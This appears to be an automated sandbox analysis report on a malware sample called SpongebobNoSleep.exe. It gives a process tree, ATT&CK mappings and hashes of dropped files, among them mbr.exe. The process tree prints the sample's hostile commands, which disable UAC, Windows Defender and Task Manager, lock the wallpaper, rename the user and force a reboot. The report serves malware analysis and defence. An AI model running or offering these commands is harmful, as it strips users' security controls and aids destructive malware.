C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1280

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4808

C:\Users\Admin\Downloads\SpongebobNoSleep (1)\SpongebobNoSleep.exe
"C:\Users\Admin\Downloads\SpongebobNoSleep (1)\SpongebobNoSleep.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D4B.tmp\SpongebobNoSleep.cmd""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:2424
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4992
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3416
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2440
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4200
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"SPONGEBOB FOUND YOU!!!"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB FOUND YOU!!!"
      4⤵
      System Location Discovery: System Language Discovery
      PID:576
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3388

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a1c855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e9a2c784e6d797d91d4b8612e14d51bd

SHA1
25e2b07c396ee82e4404af09424f747fc05f04c2

SHA256
18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6

SHA512
fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1fc959921446fa3ab5813f75ca4d0235

SHA1
0aeef3ba7ba2aa1f725fca09432d384b06995e2a

SHA256
1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c

SHA512
899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
d9560905612cf656d5dd0e741172fb4cd9c60688

SHA256
b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608

SHA512
0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
63KB

MD5
226541550a51911c375216f718493f65

SHA1
f6e608468401f9384cabdef45ca19e2afacc84bd

SHA256
caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

SHA512
2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
600B

MD5
9c47203f88169f36d35d1f78806e656e

SHA1
0f0e6c4419396723c05a9f254a4c8911bdbe73c5

SHA256
3d89cb6bef453961e637b152f13f5980de98e949574d0e6aaa134ec8e3aecd83

SHA512
3cf44ad840d2247f1cf9c6b11416a9ce67d73f6f56df76c6a27fdcf040db3306d6482e39011ffd520a97a507b42b1d990308c185b854ebe127a2b51cc079c03d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
ab5e60828b270dcc00e96000378b6b2f

SHA1
d60bdf41dc752a57ec1e829581cc4dad8e7ac838

SHA256
6737569968565edbe7986f0143720332f873880de8b9afe605104aae9d89cafc

SHA512
d6c6b89bed9f056e9e7c03a04da17e487a9652ad4437f374d25923a2d275551d5b5f76efbe2e81a505b1b401b960dafad78b84eb97060c61ba307b020daf4604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
c435519a3e1d30a93d0a0c6527a36037

SHA1
20fd25c4e9cfda0d74ae65679b09ddba2f803b09

SHA256
e0cff8c65e6f5ee888ec69e1108817d006479efe3b163c3f2c6b88361eec7a3b

SHA512
b8c7a23fd790dceae1ac0aa8fe9272f63c29539652fc5d525a1ba5d298c7d51cbdcde5bff54629b3cea93ac0b7e2c061e051f11c90dc883ed9bf5df61757b8b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
0b35be8dcfd47e739cff24480aea1407

SHA1
63bc8b2058e7b1228f35b7fd53e9595363cd2bbd

SHA256
2fce2a9b61e291dc485282d97f611f6375ccf4f45c534aa066cb3a620eba3388

SHA512
5713971ada00f20bae6a96fbb537bffae5e7a2c4e28bf4615cdb60b9f15facbdaea07977b7ee03149153b3c549b41c11e79d75a3a8aba9f5337815b6fec22502

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
93d599d7c4aa6404cea52c693b2b01ff

SHA1
b7c946a7a1109351868af314c3b5359f5faad51f

SHA256
86a99cdf53ba4d018935d9475616db296514b5db3081db03788717f2ac6cc39f

SHA512
c945684521f6cc59e401c002e74646552cc9c111cf03305ed0613cf592180a5bd8c2dd8d98f1d7241a8d39f69376ade385b9679694b97fbbc5a04348bc011913

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1204cc9e69f113692b3fae5756982c5c

SHA1
a1faf1767627f3def58d488b38d3c55e9e8e8e5f

SHA256
4c38ac981abc11938c59d967c545aa56b6c95acd98da86181a7fa69f4a23ad18

SHA512
5b51d3fd55464780564f6d71f08b96a132fe3257ab34cf491a2e2f7df5612f5bb9d720383ed58e90c65f791eb45676e3b616f1d7bb900542baa4571485a59cf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d521fe426bb9c7bd75734bb493fc72be

SHA1
fd8c558076b01b91de52738d24c46a4b43432af0

SHA256
81c1c3e663870d00c709fc4ee9d24f0edc1b55f7890d40f98534b38fbce0caf9

SHA512
9e62aaaf8ac608d47407e228a6b8b08caa5683080983cc133eb551be3fc941c620e0b0abc38239647142f79c48e4811fd948d804d1865a62149ff70dccb8874f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c1901b3976dded03dd6e5af46401153d

SHA1
ecbdda5ab01757428ca897c231553d8a5fa1273e

SHA256
b24f2e016ce150778c2360681a4789cecb92944f27f4a599c949b4b2254fce0f

SHA512
ffedce21cea4cc20a120711a4be63cc2d2424a4128846b8b3a829960d21b8ef3da84e8080a4b0950a3d4a5d326b4bbb0c274f3e893d55738578b8328f2db44b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8dc7b13dc4038a190b66303b76ab7f9e

SHA1
ece208f713c0d9bccc8102f7be65201e1ea0f501

SHA256
20699def509daa8e835407cef4e76dfafd15b102259ced941db85f12950aa2c4

SHA512
89f3f2985077c28e1f846eff9128c44a9be996f4d416f5edef447eb3bfb9b269ecdfc6a12b2bde725db9e299af898171f8f22157c88cc08ba93981926c8bd117

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
82b4b624779dcc999abfe17dd8a90334

SHA1
55845782d51b98af42dbe557de1cca5948a6012b

SHA256
6a6d9fa18f0ffb82efdadf3d6da90e20a0586e59e8b8cad476316b45a0516df4

SHA512
76cf2e1811d99f7979ae31558002cc93a6f9b3e34c50f0e7f58e6fb8c8d20fe02ab6d5724d49773517f576ad77f07db9358c7187842d37887e035c0ab427e922

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
9eb1fcce72e7611f9986fdb33ece9bf2

SHA1
8b668d0c3aa59db3646cd58a06b4eb73bc40aedc

SHA256
2e72cb34d2a497347a8128a23ea8bbd8757bf0d9538379c6583b51dcc38b046e

SHA512
e9fc3b74c30e2cca48e1cdbdac88a468f6015929998b13bdefb33c4f2d8ee2b625f19d4f018e385945e70a233bd8e4eeababf99141ca976db383506a68fb56a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e43a9cbda0fa2395676b989048ce6c53

SHA1
dae2fdd6713d16b1d81106d5506efd2dc26c40a6

SHA256
7dce16c27e4590d24126163e5a6bf9caa4eb618d7f885ee63673af5320e435b1

SHA512
1f626cb40c1f2e5ee59430df28ec8d12395840374fd9cdefb2fcd5ee935f121243a87d745f92b4f6695b03b5caf4881bf9779da0cea46aebe76a0acc2cfb922f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
3738dfc08ef7a98d3cc49a1183c4b212

SHA1
0591d100689b6b1daa9f61aa3f726a4d3b3e57f1

SHA256
f543990171d43bd9dae2a3f57de3c1e2ce46a88b055670dc888e9680d94cd6bb

SHA512
9e06bc23a20de1a82412205a59b72126396a44e65e385f7b012c9b27a569023428c0277f751e001703e90e35705a8e195908b301a6cb4618426768cc74226370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58fa3a.TMP

Filesize
868B

MD5
f44ea59bad0e2470701f7adfd0be2ec4

SHA1
e97c61f688845e63c1876cb576791e819f75198e

SHA256
1d37030f30475026632f26affb5f3eeeeac7c7ac267f4b353a85c6bde1c37a1c

SHA512
7662d4e8b8b33a9a94ea05b72f3b90f5017d6a23fcdccd7ceeebf93345d30ca27a68c7cf619c38129d6dfd8ce98d2ca94f7b1b0536e1c830431b0b4e483c3fd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\1154d4ee-0f01-4942-a000-87dfe77a7fd4\6

Filesize
9.7MB

MD5
716cafe7d82cb130112a5e33c2cc7ab9

SHA1
84370b67033afd6909ef2f84a1f6662cd079366c

SHA256
016c4ab78e80830d4e3b0967f660cf6ff3f833b0ce160e1762d811f391f07a46

SHA512
baa59afa748c59bc5421a4af191002738d18495978ad7bb25e216c24dea7292dec44b3af88aa6dec6731845f96460859ccc513c7b1464b70c744a91385a67012

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bc54f1e23b5e2258e246b02aa6e5d030

SHA1
9f65f8ace3e7cf37ed5eff35229121b855db5824

SHA256
04a5a70bef59afdaa4dd7bfb5d4eb4535dd5d4845b2204859505538b2ce3e059

SHA512
eb4d9876af0af07364c4bd257e700f772b6280f0277b7b03f97aadeb25286f7703c9722f022d1e51114e0fa5b3298ee3e22e30ac394094645ba8b8ecdfe0b308

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2f45a9f00040f50b8fa53d19527f42be

SHA1
8209bb626017f9d93bd7bc20553b403f860ed611

SHA256
94e9bdcc3decc18f0fb201bf8dd9f4d4b6899d457d6898be63618f5db035f4ac

SHA512
30c12d610794cc92a7bb20d820fb16433c55ebd159030c651bdb7074b2f3005aa5badf7a3b8eff4bedd4493659dc014bea7689abecdaaa83ec76ddf296c17777

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
e18ec1811a7901cbc3fbdac350d71316

SHA1
527d1abf5a059aa3649f42a4c6b550cbead53bd5

SHA256
7e1d33b006c2f46f1e7fd051b514f213b25ce2af95f0aefa7c4212ad87eb6635

SHA512
b56ea9d0f4cd45b9f028a6493d08bba61308c2cebff7df333cd857758d1215b05556e1bf2db4aad51eee303695e1476f25d03c21d12990c290f2eec43cf2084d

Download Submit
C:\Users\Admin\AppData\Local\Temp\D4B.tmp\Logon_overwriter.exe

Filesize
34KB

MD5
942e4fe24043059c647f584cc657c4ab

SHA1
41e98f66887a4d912a49af32bf164ab9daebf543

SHA256
ed996aabbbd002aa1d2a26954c64f47072f9388142b85cf273c190ce357597e2

SHA512
dab7a646761a2f547e5e8dee83678c1b30852ad266d03b3408475a65a5a0f3088a5b7e641d78baea697152cea735ece7b9537c7c86b7dc74773cdb336b0ee7f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\D4B.tmp\SpongebobNoSleep.cmd

Filesize
1KB

MD5
f0f8f16b1be67c7ce5d854701fae56ce

SHA1
9ef78e1bec7b3f7190231d7d1179629db0756a38

SHA256
71f31c42e96e8dd9c25b2d36959d2ee75948a10aaeae25dffc2dd03759e53f83

SHA512
ef514835e6b4ead1c649846082beed6182947e0cd90538dea6ad8290c177c657e6f9c2e4d9f473de300fb10fb1f74e691911d75239dbf926ad5cf46b7370fd0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\D4B.tmp\bg.bmp

Filesize
2.6MB

MD5
ce45a70d3cc2941a147c09264fc1cda5

SHA1
44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9

SHA256
eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac

SHA512
d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

Download Submit
C:\Users\Admin\AppData\Local\Temp\D4B.tmp\gdifuncs.exe

Filesize
120KB

MD5
3b9073afad85ea5e6a76de419645245e

SHA1
faad89b3d9df889547b9940505fce6c0aefbb727

SHA256
4e3da2fd00b3a6a758e4b3303fe5fa61d87bf12c6714934fbdf6312c9bd9851b

SHA512
e1a0622bac8bc9c88458a5cb559a2ccb8c70e4d24127ccee99595cea273609b0aa7815be6eca36ba8548a2b0491bbb00edb1e809eb7126469ce7e32a682ae72a

Download Submit
C:\Users\Admin\AppData\Local\Temp\D4B.tmp\mbr.exe

Filesize
47KB

MD5
23767616e3543edfb57b841df56a0a81

SHA1
1f2ed4a7d16ac128cb50e0333578cc61469a4f92

SHA256
8de5e3f36ac9f8f844db93e630bebb80a40c51eb84b3418054d41ba2e4ca55ea

SHA512
50081bd0091cf4c7698229475dd783f0694b27dbdb889872447d6b9af375ec54bbf8c8ab609f48d6ca6d2bd2898792793658b3c6562c6474f4b63b72b7cd4347

Download Submit
C:\Users\Admin\Downloads\SpongebobNoSleep (5).zip:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\SpongebobNoSleep.zip

Filesize
21.3MB

MD5
560b86535f0e965a00810ba75f1c7725

SHA1
8f52994f512c508c0ac6197cb9d89ababc0a4624

SHA256
6eed2abf44686e0b41cd0e62e56fc3b01ba5db1b73488cd50c969c02a735be92

SHA512
3cda9b4415562ac6e9ddacc7e420318502dd3c3103f4ea10bb7c1880cec86ba11c678b1850e91f550c0f9b8674269846b80c30563965cd7d5412f3045b5a740f

Download Submit
C:\Users\Admin\Downloads\SpongebobNoSleep.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
memory/2596-789-0x0000000000400000-0x000000000079B000-memory.dmp

Filesize
3.6MB

Download
memory/2596-802-0x0000000000400000-0x000000000079B000-memory.dmp

Filesize
3.6MB

Download
memory/2596-839-0x0000000000400000-0x000000000079B000-memory.dmp

Filesize
3.6MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads